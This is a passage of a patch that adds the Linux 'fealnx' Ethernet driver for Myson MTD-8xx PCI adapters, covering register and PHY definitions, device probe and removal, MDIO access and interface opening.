++*/
++
++#define DRV_NAME	"fealnx"
++
++static int debug;		/* 1-> print debug message */
++static int max_interrupt_work = 20;
++
++/* Maximum number of multicast addresses to filter (vs. Rx-all-multicast). */
++static int multicast_filter_limit = 32;
++
++/* Set the copy breakpoint for the copy-only-tiny-frames scheme. */
++/* Setting to > 1518 effectively disables this feature.          */
++static int rx_copybreak;
++
++/* Used to pass the media type, etc.                            */
++/* Both 'options[]' and 'full_duplex[]' should exist for driver */
++/* interoperability.                                            */
++/* The media type is usually passed in 'options[]'.             */
++#define MAX_UNITS 8		/* More are supported, limit only on options */
++static int options[MAX_UNITS] = { -1, -1, -1, -1, -1, -1, -1, -1 };
++static int full_duplex[MAX_UNITS] = { -1, -1, -1, -1, -1, -1, -1, -1 };
++
++/* Operational parameters that are set at compile time.                 */
++/* Keep the ring sizes a power of two for compile efficiency.           */
++/* The compiler will convert <unsigned>'%'<2^N> into a bit mask.        */
++/* Making the Tx ring too large decreases the effectiveness of channel  */
++/* bonding and packet priority.                                         */
++/* There are no ill effects from too-large receive rings.               */
++// 88-12-9 modify,
++// #define TX_RING_SIZE    16
++// #define RX_RING_SIZE    32
++#define TX_RING_SIZE    6
++#define RX_RING_SIZE    12
++#define TX_TOTAL_SIZE	TX_RING_SIZE*sizeof(struct fealnx_desc)
++#define RX_TOTAL_SIZE	RX_RING_SIZE*sizeof(struct fealnx_desc)
++
++/* Operational parameters that usually are not changed. */
++/* Time in jiffies before concluding the transmitter is hung. */
++#define TX_TIMEOUT      (2*HZ)
++
++#define PKT_BUF_SZ      1536	/* Size of each temporary Rx buffer. */
++
++
++/* Include files, designed to support most kernel versions 2.0.0 and later. */
++#include <linux/module.h>
++#include <linux/kernel.h>
++#include <linux/string.h>
++#include <linux/timer.h>
++#include <linux/errno.h>
++#include <linux/ioport.h>
++#include <linux/interrupt.h>
++#include <linux/pci.h>
++#include <linux/netdevice.h>
++#include <linux/etherdevice.h>
++#include <linux/skbuff.h>
++#include <linux/init.h>
++#include <linux/mii.h>
++#include <linux/ethtool.h>
++#include <linux/crc32.h>
++#include <linux/delay.h>
++#include <linux/bitops.h>
++
++#include <asm/processor.h>	/* Processor type for cache alignment. */
++#include <asm/io.h>
++#include <linux/uaccess.h>
++#include <asm/byteorder.h>
++
++/* This driver was written to use PCI memory space, however some x86 systems
++   work only with I/O space accesses. */
++#ifndef __alpha__
++#define USE_IO_OPS
++#endif
++
++/* Kernel compatibility defines, some common to David Hinds' PCMCIA package. */
++/* This is only in the support-all-kernels source code. */
++
++#define RUN_AT(x) (jiffies + (x))
++
++MODULE_AUTHOR("Myson or whoever");
++MODULE_DESCRIPTION("Myson MTD-8xx 100/10M Ethernet PCI Adapter Driver");
++MODULE_LICENSE("GPL");
++module_param(max_interrupt_work, int, 0);
++module_param(debug, int, 0);
++module_param(rx_copybreak, int, 0);
++module_param(multicast_filter_limit, int, 0);
++module_param_array(options, int, NULL, 0);
++module_param_array(full_duplex, int, NULL, 0);
++MODULE_PARM_DESC(max_interrupt_work, "fealnx maximum events handled per interrupt");
++MODULE_PARM_DESC(debug, "fealnx enable debugging (0-1)");
++MODULE_PARM_DESC(rx_copybreak, "fealnx copy breakpoint for copy-only-tiny-frames");
++MODULE_PARM_DESC(multicast_filter_limit, "fealnx maximum number of filtered multicast addresses");
++MODULE_PARM_DESC(options, "fealnx: Bits 0-3: media type, bit 17: full duplex");
++MODULE_PARM_DESC(full_duplex, "fealnx full duplex setting(s) (1)");
++
++enum {
++	MIN_REGION_SIZE		= 136,
++};
++
++/* A chip capabilities table, matching the entries in pci_tbl[] above. */
++enum chip_capability_flags {
++	HAS_MII_XCVR,
++	HAS_CHIP_XCVR,
++};
++
++/* 89/6/13 add, */
++/* for different PHY */
++enum phy_type_flags {
++	MysonPHY = 1,
++	AhdocPHY = 2,
++	SeeqPHY = 3,
++	MarvellPHY = 4,
++	Myson981 = 5,
++	LevelOnePHY = 6,
++	OtherPHY = 10,
++};
++
++struct chip_info {
++	char *chip_name;
++	int flags;
++};
++
++static const struct chip_info skel_netdrv_tbl[] = {
++	{ "100/10M Ethernet PCI Adapter",	HAS_MII_XCVR },
++	{ "100/10M Ethernet PCI Adapter",	HAS_CHIP_XCVR },
++	{ "1000/100/10M Ethernet PCI Adapter",	HAS_MII_XCVR },
++};
++
++/* Offsets to the Command and Status Registers. */
++enum fealnx_offsets {
++	PAR0 = 0x0,		/* physical address 0-3 */
++	PAR1 = 0x04,		/* physical address 4-5 */
++	MAR0 = 0x08,		/* multicast address 0-3 */
++	MAR1 = 0x0C,		/* multicast address 4-7 */
++	FAR0 = 0x10,		/* flow-control address 0-3 */
++	FAR1 = 0x14,		/* flow-control address 4-5 */
++	TCRRCR = 0x18,		/* receive & transmit configuration */
++	BCR = 0x1C,		/* bus command */
++	TXPDR = 0x20,		/* transmit polling demand */
++	RXPDR = 0x24,		/* receive polling demand */
++	RXCWP = 0x28,		/* receive current word pointer */
++	TXLBA = 0x2C,		/* transmit list base address */
++	RXLBA = 0x30,		/* receive list base address */
++	ISR = 0x34,		/* interrupt status */
++	IMR = 0x38,		/* interrupt mask */
++	FTH = 0x3C,		/* flow control high/low threshold */
++	MANAGEMENT = 0x40,	/* bootrom/eeprom and mii management */
++	TALLY = 0x44,		/* tally counters for crc and mpa */
++	TSR = 0x48,		/* tally counter for transmit status */
++	BMCRSR = 0x4c,		/* basic mode control and status */
++	PHYIDENTIFIER = 0x50,	/* phy identifier */
++	ANARANLPAR = 0x54,	/* auto-negotiation advertisement and link
++				   partner ability */
++	ANEROCR = 0x58,		/* auto-negotiation expansion and pci conf. */
++	BPREMRPSR = 0x5c,	/* bypass & receive error mask and phy status */
++};
++
++/* Bits in the interrupt status/enable registers. */
++/* The bits in the Intr Status/Enable registers, mostly interrupt sources. */
++enum intr_status_bits {
++	RFCON = 0x00020000,	/* receive flow control xon packet */
++	RFCOFF = 0x00010000,	/* receive flow control xoff packet */
++	LSCStatus = 0x00008000,	/* link status change */
++	ANCStatus = 0x00004000,	/* autonegotiation completed */
++	FBE = 0x00002000,	/* fatal bus error */
++	FBEMask = 0x00001800,	/* mask bit12-11 */
++	ParityErr = 0x00000000,	/* parity error */
++	TargetErr = 0x00001000,	/* target abort */
++	MasterErr = 0x00000800,	/* master error */
++	TUNF = 0x00000400,	/* transmit underflow */
++	ROVF = 0x00000200,	/* receive overflow */
++	ETI = 0x00000100,	/* transmit early int */
++	ERI = 0x00000080,	/* receive early int */
++	CNTOVF = 0x00000040,	/* counter overflow */
++	RBU = 0x00000020,	/* receive buffer unavailable */
++	TBU = 0x00000010,	/* transmit buffer unavilable */
++	TI = 0x00000008,	/* transmit interrupt */
++	RI = 0x00000004,	/* receive interrupt */
++	RxErr = 0x00000002,	/* receive error */
++};
++
++/* Bits in the NetworkConfig register, W for writing, R for reading */
++/* FIXME: some names are invented by me. Marked with (name?) */
++/* If you have docs and know bit names, please fix 'em */
++enum rx_mode_bits {
++	CR_W_ENH	= 0x02000000,	/* enhanced mode (name?) */
++	CR_W_FD		= 0x00100000,	/* full duplex */
++	CR_W_PS10	= 0x00080000,	/* 10 mbit */
++	CR_W_TXEN	= 0x00040000,	/* tx enable (name?) */
++	CR_W_PS1000	= 0x00010000,	/* 1000 mbit */
++     /* CR_W_RXBURSTMASK= 0x00000e00, Im unsure about this */
++	CR_W_RXMODEMASK	= 0x000000e0,
++	CR_W_PROM	= 0x00000080,	/* promiscuous mode */
++	CR_W_AB		= 0x00000040,	/* accept broadcast */
++	CR_W_AM		= 0x00000020,	/* accept mutlicast */
++	CR_W_ARP	= 0x00000008,	/* receive runt pkt */
++	CR_W_ALP	= 0x00000004,	/* receive long pkt */
++	CR_W_SEP	= 0x00000002,	/* receive error pkt */
++	CR_W_RXEN	= 0x00000001,	/* rx enable (unicast?) (name?) */
++
++	CR_R_TXSTOP	= 0x04000000,	/* tx stopped (name?) */
++	CR_R_FD		= 0x00100000,	/* full duplex detected */
++	CR_R_PS10	= 0x00080000,	/* 10 mbit detected */
++	CR_R_RXSTOP	= 0x00008000,	/* rx stopped (name?) */
++};
++
++/* The Tulip Rx and Tx buffer descriptors. */
++struct fealnx_desc {
++	s32 status;
++	s32 control;
++	u32 buffer;
++	u32 next_desc;
++	struct fealnx_desc *next_desc_logical;
++	struct sk_buff *skbuff;
++	u32 reserved1;
++	u32 reserved2;
++};
++
++/* Bits in network_desc.status */
++enum rx_desc_status_bits {
++	RXOWN = 0x80000000,	/* own bit */
++	FLNGMASK = 0x0fff0000,	/* frame length */
++	FLNGShift = 16,
++	MARSTATUS = 0x00004000,	/* multicast address received */
++	BARSTATUS = 0x00002000,	/* broadcast address received */
++	PHYSTATUS = 0x00001000,	/* physical address received */
++	RXFSD = 0x00000800,	/* first descriptor */
++	RXLSD = 0x00000400,	/* last descriptor */
++	ErrorSummary = 0x80,	/* error summary */
++	RUNTPKT = 0x40,		/* runt packet received */
++	LONGPKT = 0x20,		/* long packet received */
++	FAE = 0x10,		/* frame align error */
++	CRC = 0x08,		/* crc error */
++	RXER = 0x04,		/* receive error */
++};
++
++enum rx_desc_control_bits {
++	RXIC = 0x00800000,	/* interrupt control */
++	RBSShift = 0,
++};
++
++enum tx_desc_status_bits {
++	TXOWN = 0x80000000,	/* own bit */
++	JABTO = 0x00004000,	/* jabber timeout */
++	CSL = 0x00002000,	/* carrier sense lost */
++	LC = 0x00001000,	/* late collision */
++	EC = 0x00000800,	/* excessive collision */
++	UDF = 0x00000400,	/* fifo underflow */
++	DFR = 0x00000200,	/* deferred */
++	HF = 0x00000100,	/* heartbeat fail */
++	NCRMask = 0x000000ff,	/* collision retry count */
++	NCRShift = 0,
++};
++
++enum tx_desc_control_bits {
++	TXIC = 0x80000000,	/* interrupt control */
++	ETIControl = 0x40000000,	/* early transmit interrupt */
++	TXLD = 0x20000000,	/* last descriptor */
++	TXFD = 0x10000000,	/* first descriptor */
++	CRCEnable = 0x08000000,	/* crc control */
++	PADEnable = 0x04000000,	/* padding control */
++	RetryTxLC = 0x02000000,	/* retry late collision */
++	PKTSMask = 0x3ff800,	/* packet size bit21-11 */
++	PKTSShift = 11,
++	TBSMask = 0x000007ff,	/* transmit buffer bit 10-0 */
++	TBSShift = 0,
++};
++
++/* BootROM/EEPROM/MII Management Register */
++#define MASK_MIIR_MII_READ       0x00000000
++#define MASK_MIIR_MII_WRITE      0x00000008
++#define MASK_MIIR_MII_MDO        0x00000004
++#define MASK_MIIR_MII_MDI        0x00000002
++#define MASK_MIIR_MII_MDC        0x00000001
++
++/* ST+OP+PHYAD+REGAD+TA */
++#define OP_READ             0x6000	/* ST:01+OP:10+PHYAD+REGAD+TA:Z0 */
++#define OP_WRITE            0x5002	/* ST:01+OP:01+PHYAD+REGAD+TA:10 */
++
++/* ------------------------------------------------------------------------- */
++/*      Constants for Myson PHY                                              */
++/* ------------------------------------------------------------------------- */
++#define MysonPHYID      0xd0000302
++/* 89-7-27 add, (begin) */
++#define MysonPHYID0     0x0302
++#define StatusRegister  18
++#define SPEED100        0x0400	// bit10
++#define FULLMODE        0x0800	// bit11
++/* 89-7-27 add, (end) */
++
++/* ------------------------------------------------------------------------- */
++/*      Constants for Seeq 80225 PHY                                         */
++/* ------------------------------------------------------------------------- */
++#define SeeqPHYID0      0x0016
++
++#define MIIRegister18   18
++#define SPD_DET_100     0x80
++#define DPLX_DET_FULL   0x40
++
++/* ------------------------------------------------------------------------- */
++/*      Constants for Ahdoc 101 PHY                                          */
++/* ------------------------------------------------------------------------- */
++#define AhdocPHYID0     0x0022
++
++#define DiagnosticReg   18
++#define DPLX_FULL       0x0800
++#define Speed_100       0x0400
++
++/* 89/6/13 add, */
++/* -------------------------------------------------------------------------- */
++/*      Constants                                                             */
++/* -------------------------------------------------------------------------- */
++#define MarvellPHYID0           0x0141
++#define LevelOnePHYID0		0x0013
++
++#define MII1000BaseTControlReg  9
++#define MII1000BaseTStatusReg   10
++#define SpecificReg		17
++
++/* for 1000BaseT Control Register */
++#define PHYAbletoPerform1000FullDuplex  0x0200
++#define PHYAbletoPerform1000HalfDuplex  0x0100
++#define PHY1000AbilityMask              0x300
++
++// for phy specific status register, marvell phy.
++#define SpeedMask       0x0c000
++#define Speed_1000M     0x08000
++#define Speed_100M      0x4000
++#define Speed_10M       0
++#define Full_Duplex     0x2000
++
++// 89/12/29 add, for phy specific status register, levelone phy, (begin)
++#define LXT1000_100M    0x08000
++#define LXT1000_1000M   0x0c000
++#define LXT1000_Full    0x200
++// 89/12/29 add, for phy specific status register, levelone phy, (end)
++
++/* for 3-in-1 case, BMCRSR register */
++#define LinkIsUp2	0x00040000
++
++/* for PHY */
++#define LinkIsUp        0x0004
++
++
++struct netdev_private {
++	/* Descriptor rings first for alignment. */
++	struct fealnx_desc *rx_ring;
++	struct fealnx_desc *tx_ring;
++
++	dma_addr_t rx_ring_dma;
++	dma_addr_t tx_ring_dma;
++
++	spinlock_t lock;
++
++	/* Media monitoring timer. */
++	struct timer_list timer;
++
++	/* Reset timer */
++	struct timer_list reset_timer;
++	int reset_timer_armed;
++	unsigned long crvalue_sv;
++	unsigned long imrvalue_sv;
++
++	/* Frequently used values: keep some adjacent for cache effect. */
++	int flags;
++	struct pci_dev *pci_dev;
++	unsigned long crvalue;
++	unsigned long bcrvalue;
++	unsigned long imrvalue;
++	struct fealnx_desc *cur_rx;
++	struct fealnx_desc *lack_rxbuf;
++	int really_rx_count;
++	struct fealnx_desc *cur_tx;
++	struct fealnx_desc *cur_tx_copy;
++	int really_tx_count;
++	int free_tx_count;
++	unsigned int rx_buf_sz;	/* Based on MTU+slack. */
++
++	/* These values are keep track of the transceiver/media in use. */
++	unsigned int linkok;
++	unsigned int line_speed;
++	unsigned int duplexmode;
++	unsigned int default_port:4;	/* Last dev->if_port value. */
++	unsigned int PHYType;
++
++	/* MII transceiver section. */
++	int mii_cnt;		/* MII device addresses. */
++	unsigned char phys[2];	/* MII device addresses. */
++	struct mii_if_info mii;
++	void __iomem *mem;
++};
++
++
++static int mdio_read(struct net_device *dev, int phy_id, int location);
++static void mdio_write(struct net_device *dev, int phy_id, int location, int value);
++static int netdev_open(struct net_device *dev);
++static void getlinktype(struct net_device *dev);
++static void getlinkstatus(struct net_device *dev);
++static void netdev_timer(struct timer_list *t);
++static void reset_timer(struct timer_list *t);
++static void fealnx_tx_timeout(struct net_device *dev, unsigned int txqueue);
++static void init_ring(struct net_device *dev);
++static netdev_tx_t start_tx(struct sk_buff *skb, struct net_device *dev);
++static irqreturn_t intr_handler(int irq, void *dev_instance);
++static int netdev_rx(struct net_device *dev);
++static void set_rx_mode(struct net_device *dev);
++static void __set_rx_mode(struct net_device *dev);
++static struct net_device_stats *get_stats(struct net_device *dev);
++static int mii_ioctl(struct net_device *dev, struct ifreq *rq, int cmd);
++static const struct ethtool_ops netdev_ethtool_ops;
++static int netdev_close(struct net_device *dev);
++static void reset_rx_descriptors(struct net_device *dev);
++static void reset_tx_descriptors(struct net_device *dev);
++
++static void stop_nic_rx(void __iomem *ioaddr, long crvalue)
++{
++	int delay = 0x1000;
++	iowrite32(crvalue & ~(CR_W_RXEN), ioaddr + TCRRCR);
++	while (--delay) {
++		if ( (ioread32(ioaddr + TCRRCR) & CR_R_RXSTOP) == CR_R_RXSTOP)
++			break;
++	}
++}
++
++
++static void stop_nic_rxtx(void __iomem *ioaddr, long crvalue)
++{
++	int delay = 0x1000;
++	iowrite32(crvalue & ~(CR_W_RXEN+CR_W_TXEN), ioaddr + TCRRCR);
++	while (--delay) {
++		if ( (ioread32(ioaddr + TCRRCR) & (CR_R_RXSTOP+CR_R_TXSTOP))
++					    == (CR_R_RXSTOP+CR_R_TXSTOP) )
++			break;
++	}
++}
++
++static const struct net_device_ops netdev_ops = {
++	.ndo_open		= netdev_open,
++	.ndo_stop		= netdev_close,
++	.ndo_start_xmit		= start_tx,
++	.ndo_get_stats 		= get_stats,
++	.ndo_set_rx_mode	= set_rx_mode,
++	.ndo_eth_ioctl		= mii_ioctl,
++	.ndo_tx_timeout		= fealnx_tx_timeout,
++	.ndo_set_mac_address 	= eth_mac_addr,
++	.ndo_validate_addr	= eth_validate_addr,
++};
++
++static int fealnx_init_one(struct pci_dev *pdev,
++			   const struct pci_device_id *ent)
++{
++	struct netdev_private *np;
++	int i, option, err, irq;
++	static int card_idx = -1;
++	char boardname[12];
++	void __iomem *ioaddr;
++	unsigned long len;
++	unsigned int chip_id = ent->driver_data;
++	struct net_device *dev;
++	void *ring_space;
++	dma_addr_t ring_dma;
++	u8 addr[ETH_ALEN];
++#ifdef USE_IO_OPS
++	int bar = 0;
++#else
++	int bar = 1;
++#endif
++
++	card_idx++;
++	sprintf(boardname, "fealnx%d", card_idx);
++
++	option = card_idx < MAX_UNITS ? options[card_idx] : 0;
++
++	i = pci_enable_device(pdev);
++	if (i) return i;
++	pci_set_master(pdev);
++
++	len = pci_resource_len(pdev, bar);
++	if (len < MIN_REGION_SIZE) {
++		dev_err(&pdev->dev,
++			   "region size %ld too small, aborting\n", len);
++		return -ENODEV;
++	}
++
++	i = pci_request_regions(pdev, boardname);
++	if (i)
++		return i;
++
++	irq = pdev->irq;
++
++	ioaddr = pci_iomap(pdev, bar, len);
++	if (!ioaddr) {
++		err = -ENOMEM;
++		goto err_out_res;
++	}
++
++	dev = alloc_etherdev(sizeof(struct netdev_private));
++	if (!dev) {
++		err = -ENOMEM;
++		goto err_out_unmap;
++	}
++	SET_NETDEV_DEV(dev, &pdev->dev);
++
++	/* read ethernet id */
++	for (i = 0; i < 6; ++i)
++		addr[i] = ioread8(ioaddr + PAR0 + i);
++	eth_hw_addr_set(dev, addr);
++
++	/* Reset the chip to erase previous misconfiguration. */
++	iowrite32(0x00000001, ioaddr + BCR);
++
++	/* Make certain the descriptor lists are aligned. */
++	np = netdev_priv(dev);
++	np->mem = ioaddr;
++	spin_lock_init(&np->lock);
++	np->pci_dev = pdev;
++	np->flags = skel_netdrv_tbl[chip_id].flags;
++	pci_set_drvdata(pdev, dev);
++	np->mii.dev = dev;
++	np->mii.mdio_read = mdio_read;
++	np->mii.mdio_write = mdio_write;
++	np->mii.phy_id_mask = 0x1f;
++	np->mii.reg_num_mask = 0x1f;
++
++	ring_space = dma_alloc_coherent(&pdev->dev, RX_TOTAL_SIZE, &ring_dma,
++					GFP_KERNEL);
++	if (!ring_space) {
++		err = -ENOMEM;
++		goto err_out_free_dev;
++	}
++	np->rx_ring = ring_space;
++	np->rx_ring_dma = ring_dma;
++
++	ring_space = dma_alloc_coherent(&pdev->dev, TX_TOTAL_SIZE, &ring_dma,
++					GFP_KERNEL);
++	if (!ring_space) {
++		err = -ENOMEM;
++		goto err_out_free_rx;
++	}
++	np->tx_ring = ring_space;
++	np->tx_ring_dma = ring_dma;
++
++	/* find the connected MII xcvrs */
++	if (np->flags == HAS_MII_XCVR) {
++		int phy, phy_idx = 0;
++
++		for (phy = 1; phy < 32 && phy_idx < ARRAY_SIZE(np->phys);
++			       phy++) {
++			int mii_status = mdio_read(dev, phy, 1);
++
++			if (mii_status != 0xffff && mii_status != 0x0000) {
++				np->phys[phy_idx++] = phy;
++				dev_info(&pdev->dev,
++				       "MII PHY found at address %d, status "
++				       "0x%4.4x.\n", phy, mii_status);
++				/* get phy type */
++				{
++					unsigned int data;
++
++					data = mdio_read(dev, np->phys[0], 2);
++					if (data == SeeqPHYID0)
++						np->PHYType = SeeqPHY;
++					else if (data == AhdocPHYID0)
++						np->PHYType = AhdocPHY;
++					else if (data == MarvellPHYID0)
++						np->PHYType = MarvellPHY;
++					else if (data == MysonPHYID0)
++						np->PHYType = Myson981;
++					else if (data == LevelOnePHYID0)
++						np->PHYType = LevelOnePHY;
++					else
++						np->PHYType = OtherPHY;
++				}
++			}
++		}
++
++		np->mii_cnt = phy_idx;
++		if (phy_idx == 0)
++			dev_warn(&pdev->dev,
++				"MII PHY not found -- this device may "
++			       "not operate correctly.\n");
++	} else {
++		np->phys[0] = 32;
++/* 89/6/23 add, (begin) */
++		/* get phy type */
++		if (ioread32(ioaddr + PHYIDENTIFIER) == MysonPHYID)
++			np->PHYType = MysonPHY;
++		else
++			np->PHYType = OtherPHY;
++	}
++	np->mii.phy_id = np->phys[0];
++
++	if (dev->mem_start)
++		option = dev->mem_start;
++
++	/* The lower four bits are the media type. */
++	if (option > 0) {
++		if (option & 0x200)
++			np->mii.full_duplex = 1;
++		np->default_port = option & 15;
++	}
++
++	if (card_idx < MAX_UNITS && full_duplex[card_idx] > 0)
++		np->mii.full_duplex = full_duplex[card_idx];
++
++	if (np->mii.full_duplex) {
++		dev_info(&pdev->dev, "Media type forced to Full Duplex.\n");
++/* 89/6/13 add, (begin) */
++//      if (np->PHYType==MarvellPHY)
++		if ((np->PHYType == MarvellPHY) || (np->PHYType == LevelOnePHY)) {
++			unsigned int data;
++
++			data = mdio_read(dev, np->phys[0], 9);
++			data = (data & 0xfcff) | 0x0200;
++			mdio_write(dev, np->phys[0], 9, data);
++		}
++/* 89/6/13 add, (end) */
++		if (np->flags == HAS_MII_XCVR)
++			mdio_write(dev, np->phys[0], MII_ADVERTISE, ADVERTISE_FULL);
++		else
++			iowrite32(ADVERTISE_FULL, ioaddr + ANARANLPAR);
++		np->mii.force_media = 1;
++	}
++
++	dev->netdev_ops = &netdev_ops;
++	dev->ethtool_ops = &netdev_ethtool_ops;
++	dev->watchdog_timeo = TX_TIMEOUT;
++
++	err = register_netdev(dev);
++	if (err)
++		goto err_out_free_tx;
++
++	printk(KERN_INFO "%s: %s at %p, %pM, IRQ %d.\n",
++	       dev->name, skel_netdrv_tbl[chip_id].chip_name, ioaddr,
++	       dev->dev_addr, irq);
++
++	return 0;
++
++err_out_free_tx:
++	dma_free_coherent(&pdev->dev, TX_TOTAL_SIZE, np->tx_ring,
++			  np->tx_ring_dma);
++err_out_free_rx:
++	dma_free_coherent(&pdev->dev, RX_TOTAL_SIZE, np->rx_ring,
++			  np->rx_ring_dma);
++err_out_free_dev:
++	free_netdev(dev);
++err_out_unmap:
++	pci_iounmap(pdev, ioaddr);
++err_out_res:
++	pci_release_regions(pdev);
++	return err;
++}
++
++
++static void fealnx_remove_one(struct pci_dev *pdev)
++{
++	struct net_device *dev = pci_get_drvdata(pdev);
++
++	if (dev) {
++		struct netdev_private *np = netdev_priv(dev);
++
++		dma_free_coherent(&pdev->dev, TX_TOTAL_SIZE, np->tx_ring,
++				  np->tx_ring_dma);
++		dma_free_coherent(&pdev->dev, RX_TOTAL_SIZE, np->rx_ring,
++				  np->rx_ring_dma);
++		unregister_netdev(dev);
++		pci_iounmap(pdev, np->mem);
++		free_netdev(dev);
++		pci_release_regions(pdev);
++	} else
++		printk(KERN_ERR "fealnx: remove for unknown device\n");
++}
++
++
++static ulong m80x_send_cmd_to_phy(void __iomem *miiport, int opcode, int phyad, int regad)
++{
++	ulong miir;
++	int i;
++	unsigned int mask, data;
++
++	/* enable MII output */
++	miir = (ulong) ioread32(miiport);
++	miir &= 0xfffffff0;
++
++	miir |= MASK_MIIR_MII_WRITE + MASK_MIIR_MII_MDO;
++
++	/* send 32 1's preamble */
++	for (i = 0; i < 32; i++) {
++		/* low MDC; MDO is already high (miir) */
++		miir &= ~MASK_MIIR_MII_MDC;
++		iowrite32(miir, miiport);
++
++		/* high MDC */
++		miir |= MASK_MIIR_MII_MDC;
++		iowrite32(miir, miiport);
++	}
++
++	/* calculate ST+OP+PHYAD+REGAD+TA */
++	data = opcode | (phyad << 7) | (regad << 2);
++
++	/* sent out */
++	mask = 0x8000;
++	while (mask) {
++		/* low MDC, prepare MDO */
++		miir &= ~(MASK_MIIR_MII_MDC + MASK_MIIR_MII_MDO);
++		if (mask & data)
++			miir |= MASK_MIIR_MII_MDO;
++
++		iowrite32(miir, miiport);
++		/* high MDC */
++		miir |= MASK_MIIR_MII_MDC;
++		iowrite32(miir, miiport);
++		udelay(30);
++
++		/* next */
++		mask >>= 1;
++		if (mask == 0x2 && opcode == OP_READ)
++			miir &= ~MASK_MIIR_MII_WRITE;
++	}
++	return miir;
++}
++
++
++static int mdio_read(struct net_device *dev, int phyad, int regad)
++{
++	struct netdev_private *np = netdev_priv(dev);
++	void __iomem *miiport = np->mem + MANAGEMENT;
++	ulong miir;
++	unsigned int mask, data;
++
++	miir = m80x_send_cmd_to_phy(miiport, OP_READ, phyad, regad);
++
++	/* read data */
++	mask = 0x8000;
++	data = 0;
++	while (mask) {
++		/* low MDC */
++		miir &= ~MASK_MIIR_MII_MDC;
++		iowrite32(miir, miiport);
++
++		/* read MDI */
++		miir = ioread32(miiport);
++		if (miir & MASK_MIIR_MII_MDI)
++			data |= mask;
++
++		/* high MDC, and wait */
++		miir |= MASK_MIIR_MII_MDC;
++		iowrite32(miir, miiport);
++		udelay(30);
++
++		/* next */
++		mask >>= 1;
++	}
++
++	/* low MDC */
++	miir &= ~MASK_MIIR_MII_MDC;
++	iowrite32(miir, miiport);
++
++	return data & 0xffff;
++}
++
++
++static void mdio_write(struct net_device *dev, int phyad, int regad, int data)
++{
++	struct netdev_private *np = netdev_priv(dev);
++	void __iomem *miiport = np->mem + MANAGEMENT;
++	ulong miir;
++	unsigned int mask;
++
++	miir = m80x_send_cmd_to_phy(miiport, OP_WRITE, phyad, regad);
++
++	/* write data */
++	mask = 0x8000;
++	while (mask) {
++		/* low MDC, prepare MDO */
++		miir &= ~(MASK_MIIR_MII_MDC + MASK_MIIR_MII_MDO);
++		if (mask & data)
++			miir |= MASK_MIIR_MII_MDO;
++		iowrite32(miir, miiport);
++
++		/* high MDC */
++		miir |= MASK_MIIR_MII_MDC;
++		iowrite32(miir, miiport);
++
++		/* next */
++		mask >>= 1;
++	}
++
++	/* low MDC */
++	miir &= ~MASK_MIIR_MII_MDC;
++	iowrite32(miir, miiport);
++}
++
++
++static int netdev_open(struct net_device *dev)
++{
++	struct netdev_private *np = netdev_priv(dev);
++	void __iomem *ioaddr = np->mem;
++	const int irq = np->pci_dev->irq;
++	int rc, i;
++
++	iowrite32(0x00000001, ioaddr + BCR);	/* Reset */
++
++	rc = request_irq(irq, intr_handler, IRQF_SHARED, dev->name, dev);
++	if (rc)
++		return -EAGAIN;
++
++	for (i = 0; i < 3; i++)
++		iowrite16(((const unsigned short *)dev->dev_addr)[i],
++				ioaddr + PAR0 + i*2);
++
++	init_ring(dev);
++
++	iowrite32(np->rx_ring_dma, ioaddr + RXLBA);
++	iowrite32(np->tx_ring_dma, ioaddr + TXLBA);
++
++	/* Initialize other registers. */
++	/* Configure the PCI bus bursts and FIFO thresholds.
++	   486: Set 8 longword burst.
++	   586: no burst limit.
++	   Burst length 5:3
++	   0 0 0   1
++	   0 0 1   4
++	   0 1 0   8
++	   0 1 1   16
++	   1 0 0   32
++	   1 0 1   64
++	   1 1 0   128
++	   1 1 1   256
++	   Wait the specified 50 PCI cycles after a reset by initializing
++	   Tx and Rx queues and the address filter list.
++	   FIXME (Ueimor): optimistic for alpha + posted writes ? */
++
++	np->bcrvalue = 0x10;	/* little-endian, 8 burst length */
++#ifdef __BIG_ENDIAN
++	np->bcrvalue |= 0x04;	/* big-endian */
++#endif
++
++#if defined(__i386__) && !defined(MODULE) && !defined(CONFIG_UML)
++	if (boot_cpu_data.x86 <= 4)
++		np->crvalue = 0xa00;
++	else
++#endif
++		np->crvalue = 0xe00;	/* rx 128 burst length */
++
++
++// 89/12/29 add,
++// 90/1/16 modify,
++//   np->imrvalue=FBE|TUNF|CNTOVF|RBU|TI|RI;
++	np->imrvalue = TUNF | CNTOVF | RBU | TI | RI;
++	if (np->pci_dev->device == 0x891) {
++		np->bcrvalue |= 0x200;	/* set PROG bit */
++		np->crvalue |= CR_W_ENH;	/* set enhanced bit */
++		np->imrvalue |= ETI;
++	}
++	iowrite32(np->bcrvalue, ioaddr + BCR);
++
++	if (dev->if_port == 0)
++		dev->if_port = np->default_port;
++
++	iowrite32(0, ioaddr + RXPDR);
++// 89/9/1 modify,
++//   np->crvalue = 0x00e40001;    /* tx store and forward, tx/rx enable */
++	np->crvalue |= 0x00e40001;	/* tx store and forward, tx/rx enable */
++	np->mii.full_duplex = np->mii.force_media;
++	getlinkstatus(dev);
++	if (np->linkok)
++		getlinktype(dev);
++	__set_rx_mode(dev);
++
++	netif_start_queue(dev);
++
++	/* Clear and Enable interrupts by setting the interrupt mask. */
++	iowrite32(FBE | TUNF | CNTOVF | RBU | TI | RI, ioaddr + ISR);
++	iowrite32(np->imrvalue, ioaddr + IMR);
++
++	if (debug)
++		printk(KERN_DEBUG "%s: Done netdev_open().\n", dev->name);
++
++	/* Set the timer to check for link beat. */
++	timer_setup(&np->timer, netdev_timer, 0);
++	np->timer.expires = RUN_AT(3 * HZ);
++
++	/* timer handler */
++	add_timer(&np->timer);
++
++	timer_setup(&np->reset_timer, reset_timer, 0);
++	np->reset_timer_armed = 0;
++	return rc;
++}
++
++
++static void getlinkstatus(struct net_device *dev)
++/* function: Routine will read MII Status Register to get link status.       */
++/* input   : dev... pointer to the adapter block.                            */
++/* output  : none.                                                           */
++{
++	struct netdev_private *np = netdev_priv(dev);
++	unsigned int i, DelayTime = 0x1000;
++
++	np->linkok = 0;
++
++	if (np->PHYType == MysonPHY) {
++		for (i = 0; i < DelayTime; ++i) {
++			if (ioread32(np->mem + BMCRSR) & LinkIsUp2) {
++				np->linkok = 1;
++				return;
++			}
++			udelay(100);
++		}
++	} else {
++		for (i = 0; i < DelayTime; ++i) {
++			if (mdio_read(dev, np->phys[0], MII_BMSR) & BMSR_LSTATUS) {
++				np->linkok = 1;
++				return;
++			}
++			udelay(100);
++		}
++	}
++}
++
++
++static void getlinktype(struct net_device *dev)
++{
++	struct netdev_private *np = netdev_priv(dev);
++
